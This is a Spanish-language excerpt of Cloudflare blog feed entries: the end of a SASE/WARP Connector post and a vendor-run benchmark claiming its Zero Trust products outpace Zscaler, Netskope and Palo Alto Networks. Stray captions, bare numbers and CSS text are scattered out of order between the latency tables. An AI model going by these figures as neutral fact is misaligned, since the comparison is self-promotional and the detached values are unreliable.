            </figure><p><a href="https://www.cloudflare.com/learning/access-management/what-is-ztna/">ZTNA</a> funciona bien como paradigma del sector para el acceso seguro con menos privilegios de usuario a aplicación, pero debería extenderse más a los casos de uso de redes seguras que implican tráfico bidireccional o iniciado por el servidor. Este enfoque tiene su origen en una tendencia emergente que imagina un modelo de conectividad de malla superpuesta a través de nubes, nubes privadas virtuales o segmentos de red sin depender de enrutadores. Para una verdadera conectividad universal, los clientes necesitan flexibilidad para cubrir todos sus casos de uso de conectividad de red y acceso a aplicaciones. No todos los accesos a la red de los proveedores de SASE pueden extenderse más allá del tráfico iniciado por el cliente sin requerir cambios en el enrutamiento de la red o afectar a la seguridad, por lo que las afirmaciones genéricas de "conectividad universal" pueden no ser lo que parecen en un principio.</p><p><i>Diagrama que muestra los conectores de software de Cloudflare (accesos) que garantizan los flujos de trabajo de DevOps que implican tráfico bidireccional entre desarrolladores y servidores.</i></p><p>Cloudflare amplía el alcance de ZTNA para garantizar que se cubren todos los casos de uso de usuario a aplicación, además de redes seguras de malla y punto a punto para que las opciones de conectividad sean lo más amplias y flexibles posible. Los flujos de trabajo de servicio a servicio de DevOps se pueden ejecutar eficazmente en la misma plataforma que ejecuta ZTNA, que sustituye la VPN o que gestiona SASE de clase empresarial. Cloudflare actúa como "enlace" de conexión entre todos los usuarios y recursos de DevOps, independientemente del flujo de tráfico en cada paso. Esta misma tecnología, es decir, <a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/private-net/warp-connector/">WARP Connector</a>, permite a los administradores gestionar diferentes redes privadas con rangos IP superpuestos, VPC y RFC 1918, admitir tráfico iniciado por el servidor y conectividad de aplicaciones punto a punto (por ejemplo, SCCM, AD, tráfico VoIP y SIP) sobre redes privadas existentes, crear redes privadas punto a punto (por ejemplo, flujos de recursos CI/CD) y enrutar el tráfico de forma determinista. Las organizaciones también pueden automatizar la gestión de su plataforma SASE con el proveedor Terraform de Cloudflare.</p>
    <div>
      <h2>La diferencia de Cloudflare</h2>
      <a href="#la-diferencia-de-cloudflare">
        
      </a>
    </div>
    <p>La plataforma SASE de proveedor único de Cloudflare, <a href="https://www.cloudflare.com/zero-trust/">Cloudflare One</a> se ha desarrollado en nuestra <a href="https://www.cloudflare.com/connectivity-cloud/">conectividad cloud</a>, la futura evolución de la nube pública, que proporciona una plataforma unificada e inteligente de servicios programables y componibles que permiten la conectividad entre todas las redes (empresariales y de Internet), nubes, aplicaciones y usuarios. Nuestra conectividad cloud es lo suficientemente flexible como para hacer que la "conectividad universal" sea una realidad más asequible para las organizaciones que implementan una arquitectura SASE, dando cabida a las preferencias de implementación junto con la orientación prescriptiva. Cloudflare se ha creado para ofrecer la amplitud y calado necesarios para ayudar a las organizaciones a recuperar el control informático a través de SASE de proveedor único y más allá, a la vez que se simplifican los flujos de trabajo para cada equipo que contribuya en el camino.</p><p>Otros proveedores de SASE diseñaron sus centros de datos para el tráfico de salida a Internet. Su diseño no contempla la gestión ni la protección del tráfico este-oeste, y no proporcionan servicios de milla intermedia o de seguridad para el tráfico que pasa de una filial a la sede central o entre filiales. La red troncal global de milla intermedia de Cloudflare es compatible con la seguridad y las redes para cualquier conectividad, tanto si los usuarios trabajan presencialmente como en remoto, y tanto si las aplicaciones están en el centro de datos como en la nube.</p><p>Para saber más, lee nuestra arquitectura de referencia, "<a href="https://developers.cloudflare.com/reference-architecture/sase-reference-architecture/">Cómo desarrollar una arquitectura SASE con Cloudflare</a>", o <a href="https://www.cloudflare.com/products/zero-trust/plans/enterprise/">habla con un experto de Cloudflare One</a>.</p> ]]></content:encoded>
            <category><![CDATA[SASE]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[DevOps (ES)]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Magic WAN]]></category>
            <category><![CDATA[WARP Connector (ES)]]></category>
            <category><![CDATA[Noticias de productos]]></category>
            <category><![CDATA[Conectividad cloud]]></category>
            <guid isPermaLink="false">5Emh2Yz5XTRKse4w0c40dp</guid>
            <dc:creator>Michael Keane</dc:creator>
        </item>
        <item>
            <title><![CDATA[Zero Trust: somos los más rápidos y aquí está la prueba]]></title>
            <link>https://blog.cloudflare.com/es-es/spotlight-on-zero-trust/</link>
            <pubDate>Wed, 21 Jun 2023 13:01:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare prevalece sobre los demás proveedores con la puerta de enlace web segura más rápida en el 42 % de los escenarios de prueba. En los escenarios de acceso a la red Zero Trust, Cloudflare es un 46 % más rápido que Zscaler, un 56 % más rápido que Netskope y un 10 % más rápido que Palo Alto ]]></description>
            <content:encoded><![CDATA[ <p>En <a href="/es-es/network-performance-update-cio-edition-es-es/">enero</a> y en <a href="/es-es/network-performance-update-security-week-2023-es-es/">marzo</a> de 2023, publicamos sendos blogs en los que comparábamos el rendimiento de las soluciones Zero Trust de Cloudflare frente a las de sus competidores. La conclusión en ambos casos fue que Cloudflare era más rápido que Zscaler y Netskope en diversos escenarios Zero Trust. Durante la Speed Week, hemos recuperado estas pruebas y hemos subido la apuesta. Hemos probado un mayor número de proveedores en más puntos finales públicos de Internet y en más regiones que en el pasado.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/64QhmRav0dTmbfKmjNbOFz/6f7e77c3c42c740924b1fbaaf1b70c35/image3-18.png" />
            
            </figure><p>Para ello, probamos tres escenarios Zero Trust: la puerta de enlace web segura (SWG), el acceso a la red Zero Trust (ZTNA) y el aislamiento remoto del navegador (RBI). Realizamos pruebas contra tres competidores: Zscaler, Netskope y Palo Alto Networks. Probamos estos escenarios desde 12 regiones de todo el mundo, frente a las cuatro con las que lo habíamos hecho anteriormente. Los resultados revelan que Cloudflare prevalece sobre los demás proveedores con la puerta de enlace web segura más rápida en el 42 % de los escenarios de prueba. En los escenarios de acceso a la red Zero Trust, Cloudflare es un 46 % más rápido que Zscaler, un 56 % más rápido que Netskope y un 10 % más rápido que Palo Alto, así como un 64 % más rápido que Zscaler en los escenarios de aislamiento remoto del navegador.</p><p>En este blog, repasaremos por qué es importante el rendimiento, analizaremos en detalle qué nos hace más rápidos en cada escenario y hablaremos de cómo medimos el rendimiento de cada producto.</p>
    <div>
      <h3>El rendimiento es un vector de amenaza</h3>
      <a href="#el-rendimiento-es-un-vector-de-amenaza">
        
      </a>
    </div>
    <p>El rendimiento de las soluciones Zero Trust es importante, ya que si es deficiente, los usuarios lo desactivan, exponiendo a las organizaciones a grandes riesgos. Los servicios Zero Trust deben ser imperceptibles, de lo contrario, impedirán a los usuarios realizar su trabajo.</p><p>Los servicios Zero Trust pueden incluir muchas funciones que ayuden a proteger a los clientes, pero nada de eso importa si los usuarios no pueden utilizar los servicios para hacer su trabajo con rapidez y eficacia. Un rendimiento rápido ayuda a promover la implementación y hace que la seguridad sea imperceptible para los usuarios finales. En Cloudflare, priorizamos el desarrollo de productos rápidos y sencillos, y los resultados hablan por sí solos. Así que pasemos ahora a los resultados, empezando por nuestra puerta de enlace web segura.</p>
    <div>
      <h3>Cloudflare Gateway: seguridad en Internet</h3>
      <a href="#cloudflare-gateway-seguridad-en-internet">
        
      </a>
    </div>
    <p>Una puerta de enlace web segura debe ser rápida porque actúa como un embudo para todo el tráfico de entrada a Internet de una organización. Si una puerta de enlace web segura es lenta, el tráfico de los usuarios a Internet también lo será. Si el tráfico que sale a Internet es lento, los usuarios experimentarán una velocidad de carga de páginas deficiente, sus videollamadas serán inestables o se cortarán o, lo que es peor, no podrán realizar su trabajo. Los usuarios pueden decidir desconectar la puerta de enlace, exponiendo así a la organización al riesgo de ataques.</p><p>Una puerta de enlace web eficaz no solo debe estar cerca de los usuarios, sino estar correctamente emparejada al resto de Internet. Esta ventaja evita las rutas lentas a los sitios web a los que los usuarios quieren acceder. Muchos sitios web utilizan CDN para acelerar sus contenidos y ofrecer mejores experiencias. Estas CDN suelen estar bien interconectadas e integradas en redes de última milla. Sin embargo, el tráfico a través de una puerta de enlace web segura sigue una ruta de proxy de reenvío. Los usuarios se conectan al proxy, y este, a su vez, se conecta a los sitios web a los que los usuarios intentan acceder. Si ese proxy no está tan bien emparejado como lo están los sitios web de destino, el tráfico del usuario podría recorrer mayor distancia para llegar al proxy de lo que habría necesitado si solo se dirigiera al propio sitio web, creando así una horquilla, tal y como se demuestra en el diagrama siguiente:</p><p>Un proxy bien conectado garantiza que el tráfico del usuario recorra menos distancia, acelerándolo lo más posible.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6y6fTk2iSsCcmU5bYOjGR9/317a5dd6e702eda035716b28d8d2b4be/image1-24.png" />
            
            </figure><p>En cuanto a los productos de puerta de enlace web segura, hemos comparado Cloudflare Gateway y el cliente WARP con los productos de Zscaler, Netskope y Palo Alto que realizan las mismas funciones. Los usuarios de Cloudflare se benefician de la integración de Gateway y la red de Cloudflare en las redes de última milla cercanas a los usuarios, ya que se interconecta con más de 12 000 redes. Se muestra esa mayor conectividad porque Cloudflare Gateway es la red más rápida en el 42 % de los escenarios probados:</p><p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-1wig{font-weight:bold;text-align:left;vertical-align:top} .tg .tg-lqy6{text-align:right;vertical-align:top} .tg .tg-amwm{font-weight:bold;text-align:center;vertical-align:top} .tg .tg-l2oz{font-weight:bold;text-align:right;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top}</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2iksxeLBHJC088IhO3Bfz0/23067ae3d1458e242761334b56d7bcb1/image6-2.png" />
            
            </figure>
<table>
<thead>
  <tr>
    <th><span>Number of testing scenarios where each provider is fastest for 95th percentile HTTP Response time (higher is better)</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>Provider</span></td>
    <td><span>Scenarios where this provider is fastest</span></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>48</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td><span>14</span></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>10</span></td>
  </tr>
  <tr>
    <td><span>Palo Alto Networks</span></td>
    <td><span>42</span></td>
  </tr>
</tbody>
</table><p>Número de escenarios de prueba en los que cada proveedor es el más rápido para el percentil 95 del tiempo de respuesta HTTP (cuanto más alto, mejor)</p>
<table>
<thead>
  <tr>
    <th><span>95th percentile HTTP response across all tests</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>Provider</span></td>
    <td><span>95th percentile response (ms)</span></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>515</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td><span>595</span></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>550</span></td>
  </tr>
  <tr>
    <td><span>Palo Alto Networks</span></td>
    <td><span>529</span></td>
  </tr>
</tbody>
</table><p>proveedor</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5t0a2sQt3LPP0ZPq8Pr17a/c2d4824246cd93c92bdf8c8bf0c95197/image2-19.png" />
            
            </figure><p>Escenarios en los que este proveedor es el más rápido</p><p>Cloudflare</p><p>48</p>
<table>
<thead>
  <tr>
    <th></th>
    <th><span>Endpoints</span></th>
    <th></th>
    <th></th>
    <th></th>
    <th></th>
    <th></th>
    <th></th>
    <th></th>
    <th></th>
    <th></th>
    <th></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>SWG Regions</span></td>
    <td><span>Shopify</span></td>
    <td><span>Walmart</span></td>
    <td><span>Zendesk</span></td>
    <td><span>ServiceNow</span></td>
    <td><span>Azure Site</span></td>
    <td><span>Slack</span></td>
    <td><span>Zoom</span></td>
    <td><span>Box</span></td>
    <td><span>M365</span></td>
    <td><span>GitHub</span></td>
    <td><span>Bitbucket</span></td>
  </tr>
  <tr>
    <td><span>East US</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Cloudflare</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>West US</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Cloudflare</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>South Central US</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Cloudflare</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>Brazil South</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Zscaler</span></td>
    <td><span>Zscaler</span></td>
    <td><span>Zscaler</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
  </tr>
  <tr>
    <td><span>UK South</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
  </tr>
  <tr>
    <td><span>Central India</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>Southeast Asia</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>Canada Central</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Zscaler</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Zscaler</span></td>
  </tr>
  <tr>
    <td><span>Switzerland North</span></td>
    <td><span>netskope</span></td>
    <td><span>Zscaler</span></td>
    <td><span>Zscaler</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>netskope</span></td>
    <td><span>netskope</span></td>
    <td><span>netskope</span></td>
    <td><span>netskope</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>netskope</span></td>
  </tr>
  <tr>
    <td><span>Australia East</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>netskope</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>UAE Dubai</span></td>
    <td><span>Zscaler</span></td>
    <td><span>Zscaler</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Zscaler</span></td>
    <td><span>netskope</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Zscaler</span></td>
    <td><span>Zscaler</span></td>
    <td><span>netskope</span></td>
    <td><span>netskope</span></td>
  </tr>
  <tr>
    <td><span>South Africa North</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Zscaler</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Zscaler</span></td>
    <td><span>Palo Alto Networks</span></td>
    <td><span>Palo Alto Networks</span></td>
  </tr>
</tbody>
</table><p>Zscaler</p><p>14</p><p>Netskope</p><p>10</p><p>Palo Alto Networks</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6R4QPhCbp3tdUfKdRzxKyl/9a207d7ab6518182a68f2cc3e2f73f0a/image4-15.png" />
            
            </figure>
<table>
<thead>
  <tr>
    <th><span>Zero Trust Network Access P95 HTTP Response times</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>Provider</span></td>
    <td><span>P95 HTTP response (ms)</span></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>1252</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td><span>2388</span></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>2974</span></td>
  </tr>
  <tr>
    <td><span>Palo Alto Networks</span></td>
    <td><span>1471</span></td>
  </tr>
</tbody>
</table><p>42</p><p>Estos datos indican que somos más rápidos en más sitios web de más lugares que cualquiera de nuestros competidores. Para esta métrica, nos fijamos en el percentil 95 del tiempo de respuesta HTTP: cuánto tarda un usuario en pasar por el proxy, el tiempo que el proxy tarda en realizar una solicitud a un sitio web en Internet y en devolver la respuesta finalmente. Esta lectura es importante porque es una representación precisa de lo que ven los usuarios. Si observamos el percentil 95 de todas las pruebas, vemos que Cloudflare es un 2,5 % más rápido que Palo Alto Networks, un 13 % más rápido que Zscaler y un 6,5 % más rápido que Netskope.</p><p>.tg {border-collapse:collapse;border-color:#ccc;border-spacing:0;} .tg td{background-color:#fff;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;overflow:hidden;padding:10px 5px;word-break:normal;} .tg th{background-color:#f0f0f0;border-color:#ccc;border-style:solid;border-width:1px;color:#333; font-family:Arial, sans-serif;font-size:14px;font-weight:normal;overflow:hidden;padding:10px 5px;word-break:normal;} .tg .tg-1wig{font-weight:bold;text-align:left;vertical-align:top} .tg .tg-lqy6{text-align:right;vertical-align:top} .tg .tg-amwm{font-weight:bold;text-align:center;vertical-align:top} .tg .tg-l2oz{font-weight:bold;text-align:right;vertical-align:top} .tg .tg-0lax{text-align:left;vertical-align:top}</p><p>Percentil 95 del tiempo de respuesta HTTP en todas las pruebas</p><p>proveedor</p><p>Respuesta del percentil 95 (m/s)</p>
<table>
<thead>
  <tr>
    <th><span>95th percentile HTTP Response times (ms) for applications hosted in Ashburn, VA</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>AWS East US</span></td>
    <td><span>Total (ms)</span></td>
    <td><span>New Sessions (ms)</span></td>
    <td><span>Existing Sessions (ms)</span></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>2849</span></td>
    <td><span>1749</span></td>
    <td><span>1353</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td><span>5340</span></td>
    <td><span>2953</span></td>
    <td><span>2491</span></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>6513</span></td>
    <td><span>3748</span></td>
    <td><span>2897</span></td>
  </tr>
  <tr>
    <td><span>Palo Alto Networks</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>Azure East US</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>1692</span></td>
    <td><span>989</span></td>
    <td><span>1169</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td><span>5403</span></td>
    <td><span>2951</span></td>
    <td><span>2412</span></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>6601</span></td>
    <td><span>3805</span></td>
    <td><span>2964</span></td>
  </tr>
  <tr>
    <td><span>Palo Alto Networks</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>GCP East US</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>2811</span></td>
    <td><span>1615</span></td>
    <td><span>1320</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>6694</span></td>
    <td><span>3819</span></td>
    <td><span>3023</span></td>
  </tr>
  <tr>
    <td><span>Palo Alto Networks</span></td>
    <td><span>2258</span></td>
    <td><span>894</span></td>
    <td><span>1464</span></td>
  </tr>
</tbody>
</table><p>Cloudflare</p><p>515</p><p>Zscaler</p>
<table>
<thead>
  <tr>
    <th><span>95th percentile HTTP Response times (ms) for applications hosted in Singapore</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>AWS Singapore</span></td>
    <td><span>Total (ms)</span></td>
    <td><span>New Sessions (ms)</span></td>
    <td><span>Existing Sessions (ms)</span></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>2748</span></td>
    <td><span>1568</span></td>
    <td><span>1310</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td><span>5349</span></td>
    <td><span>3033</span></td>
    <td><span>2500</span></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>6402</span></td>
    <td><span>3598</span></td>
    <td><span>2990</span></td>
  </tr>
  <tr>
    <td><span>Palo Alto Networks</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>Azure Singapore</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>1831</span></td>
    <td><span>1022</span></td>
    <td><span>1181</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td><span>5699</span></td>
    <td><span>3037</span></td>
    <td><span>2577</span></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>6722</span></td>
    <td><span>3834</span></td>
    <td><span>3040</span></td>
  </tr>
  <tr>
    <td><span>Palo Alto Networks</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>GCP</span><span> </span><span>Singapore</span></td>
    <td></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>2820</span></td>
    <td><span>1641</span></td>
    <td><span>1355</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td><span>5499</span></td>
    <td><span>3037</span></td>
    <td><span>2412</span></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>6525</span></td>
    <td><span>3713</span></td>
    <td><span>2992</span></td>
  </tr>
  <tr>
    <td><span>Palo Alto Networks</span></td>
    <td><span>2293</span></td>
    <td><span>922</span></td>
    <td><span>1476</span></td>
  </tr>
</tbody>
</table><p>595</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1fzKAxsfunreEjy3jtJqDG/4dd7dfb680e18f227f9c18f4cf5ccaf6/image5-11.png" />
            
            </figure>
<table>
<thead>
  <tr>
    <th><span>Zero Trust Network Access 95th percentile HTTP Response times for warm connections with testing locations in North America</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>Provider</span></td>
    <td><span>P95 HTTP response (ms)</span></td>
  </tr>
  <tr>
    <td><span>Cloudflare</span></td>
    <td><span>810</span></td>
  </tr>
  <tr>
    <td><span>Zscaler</span></td>
    <td><span>1290</span></td>
  </tr>
  <tr>
    <td><span>Netskope</span></td>
    <td><span>1351</span></td>
  </tr>
  <tr>
    <td><span>Palo Alto Networks</span></td>
    <td><span>871</span></td>
  </tr>
</tbody>
</table><p>Netskope</p>
<table>
<thead>
  <tr>
    <th><span>Fastest ZTNA provider in each cloud provider and region by 95th percentile HTTP Response</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td></td>
    <td><span>AWS</span></td>
    <td><span>Azure</span></td>
    <td><span>GCP</span></td>
  </tr>
  <tr>
    <td><span>Australia East</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>Brazil South</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>N/A</span></td>
  </tr>
  <tr>
    <td><span>Canada Central</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>Central India</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>East US</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>South Africa North</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>N/A</span></td>
  </tr>
  <tr>
    <td><span>South Central US</span></td>
    <td><span>N/A</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Zscaler</span></td>
  </tr>
  <tr>
    <td><span>Southeast Asia</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>Switzerland North</span></td>
    <td><span>N/A</span></td>
    <td><span>N/A</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>UAE Dubai</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>UK South</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>netskope</span></td>
  </tr>
  <tr>
    <td><span>West US</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>N/A</span></td>
  </tr>
</tbody>
</table><p>550</p><p>Palo Alto Networks</p><p>529</p><p>Cloudflare se impone frente a sus competidores porque nuestro emparejamiento excepcional nos permite tener éxito en lugares donde otros no pudieron. Somos capaces de conseguir emparejamiento local en lugares del planeta de difícil acceso, lo que nos coloca en una posición de ventaja. Por ejemplo, echa un vistazo al rendimiento de Cloudflare frente a otros competidores en Australia, donde somos un 30 % más rápidos que el segundo proveedor más rápido:</p><p>Cloudflare establece excelentes relaciones de emparejamiento en países de todo el mundo. En Australia, podemos lograr emparejamiento local con todos los principales proveedores de Internet australianos, por lo que podemos ofrecer experiencias rápidas a muchos usuarios de todo el mundo. A nivel global, estamos emparejados con más de 12 000 redes, acercándonos todo lo que podemos a los usuarios finales para acortar el tiempo que las solicitudes pasan en la red pública de Internet. Este trabajo nos ha permitido anteriormente agilizar la entrega de contenidos a los usuarios, pero en un mundo Zero Trust, nos permite acortar el camino que siguen los usuarios para llegar a su puerta de enlace web segura, lo que significa que pueden acceder rápidamente a los servicios que necesitan.</p>
<table>
<thead>
  <tr>
    <th><span>Fastest RBI provider in each cloud provider and region by 95th percentile HTTP Response</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td></td>
    <td><span>AWS</span></td>
    <td><span>Azure</span></td>
    <td><span>GCP</span></td>
  </tr>
  <tr>
    <td><span>Australia East</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>Brazil South</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>Canada Central</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>Central India</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>East US</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>South Africa North</span></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
    <td></td>
  </tr>
  <tr>
    <td><span>South Central US</span></td>
    <td></td>
    <td><span>Cloudflare</span></td>
    <td><span>Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>Southeast Asia</span></td>
    <td><span>Cloudflare</span></td>
